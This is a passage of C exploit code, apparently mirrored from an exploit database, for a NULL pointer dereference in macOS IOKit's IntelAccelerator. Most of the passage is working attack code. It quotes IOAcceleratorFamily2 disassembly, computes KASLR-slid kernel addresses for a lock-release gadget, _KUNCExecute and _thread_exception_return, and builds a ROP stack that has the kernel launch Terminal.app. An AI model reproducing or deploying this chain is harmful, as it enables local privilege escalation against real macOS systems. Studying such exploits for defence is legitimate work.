Apple Mac OS X IOKit IntelAccelerator空指针间接引用本地(3)


  /*
    in IOAcceleratorFamily2
    two locks are held - r12 survives the pivot, this should unlock all the locks from there:
 __text:0000000000006F80                lea    rsi, unk_32223
 __text:0000000000006F87                mov    rbx, [r12+118h]
 __text:0000000000006F8F                mov    rax, [rbx]
 __text:0000000000006F92                mov    rdi, rbx
 __text:0000000000006F95                xor    edx, edx
 __text:0000000000006F97                call    qword ptr [rax+858h]
 __text:0000000000006F9D                mov    rdi, rbx        ; this
 __text:0000000000006FA0                call    __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
 __text:0000000000006FA5                mov    rdi, [rbx+88h]
 __text:0000000000006FAC                call    _IOLockUnlock
 __text:0000000000006FB1
 __text:0000000000006FB1 loc_6FB1:                              ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
 __text:0000000000006FB1                xor    ecx, ecx
 __text:0000000000006FB3                jmp    loc_68BC
 ...
 __text:00000000000068BC                mov    eax, ecx        ; jumptable 00000000000067F1 default case
 __text:00000000000068BE                add    rsp, 38h
 __text:00000000000068C2                pop    rbx
 __text:00000000000068C3                pop    r12
 __text:00000000000068C5                pop    r13
 __text:00000000000068C7                pop    r14
 __text:00000000000068C9                pop    r15
 __text:00000000000068CB                pop    rbp
 __text:00000000000068CC                retn
  */
  uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;

printf("0x%016llx\n", unlock_locks);

uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
  uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
   
  //char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
  char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";

uint64_t rop_stack[] = {
    0,                //pop r14
    0,                //pop r15
    0,                //pop rbp  +10
    unlock_locks,
    pivot,            //+20  virtual call is rax+20
    0, //+10
    0, //+18
    0,
    0, //+28
    0,
    0, //+38
    0, //pop rbx
    0, //pop r12
    0, //pop r13
    0, //pop r14
    0, //pop r15
    0, //pop rbp
    pop_rdi_ret,
    (uint64_t)payload,
    pop_rsi_ret,
    0,
    pop_rdx_ret,
    0,
    KUNCExecute,
    thread_exception_return
  };

uint64_t* r = malloc(sizeof(rop_stack));
  memcpy(r, rop_stack, sizeof(rop_stack));
  *len = sizeof(rop_stack);
  return r;
 }
